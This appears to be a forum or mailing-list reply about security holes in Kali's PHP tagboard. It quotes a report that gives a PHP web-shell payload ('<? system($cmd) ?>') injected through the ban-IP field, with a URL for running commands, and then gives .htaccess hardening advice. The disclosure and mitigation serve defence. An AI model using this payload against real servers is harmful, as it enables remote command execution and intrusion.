For reference, Kali's tagboard can be found at:
http://www.xentrik.net/php/tagboard.php

: There are some bugs in the kali's tagboard, you can access to the admin
: system without password!, you can put iframes, scripts... But the most
: vulnerability is in the ban ip's, you can put this script:
: " <? system($cmd) ?> " and execute commands in the server with this url:
: Example: http://web.com/tag/admin/banned.php?&cmd=command.

From the readme.txt:

I suggest you password protect this directory with .htaccess, like so:

******************************************
* Example .htaccess File
******************************************
AuthUserFile /home/username/public_html/tagboard/admin/.htpasswd
AuthGroupFile /dev/null
AuthName "Tagboard Admin Area"
AuthType Basic

<Limit GET POST>
require valid-user
</Limit>
******************************************

To learn more about password protection with .htaccess, go to
http://www.xentrik.net/htaccess/password.php
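
An added example, not part of the readme or of this message: the readme's `<Limit GET POST>` wrapper applies `require valid-user` only to those two methods, so the variant below drops the wrapper. The password file path is a placeholder chosen for illustration.

```apache
# admin/.htaccess (added example, not the tagboard's own file)

# As quoted from the readme: the requirement applies only to the methods
# named in <Limit>, so a request using any other method is not challenged.
#   <Limit GET POST>
#   require valid-user
#   </Limit>

# Corrected form: no <Limit> wrapper, so the requirement covers every method.
AuthType Basic
AuthName "Tagboard Admin Area"
# Placeholder path (assumption): a password file kept outside the web root.
AuthUserFile /home/username/.htpasswd-tagboard
Require valid-user
```

These directives take effect only if the server configuration allows `AuthConfig` overrides (`AllowOverride`) for the directory.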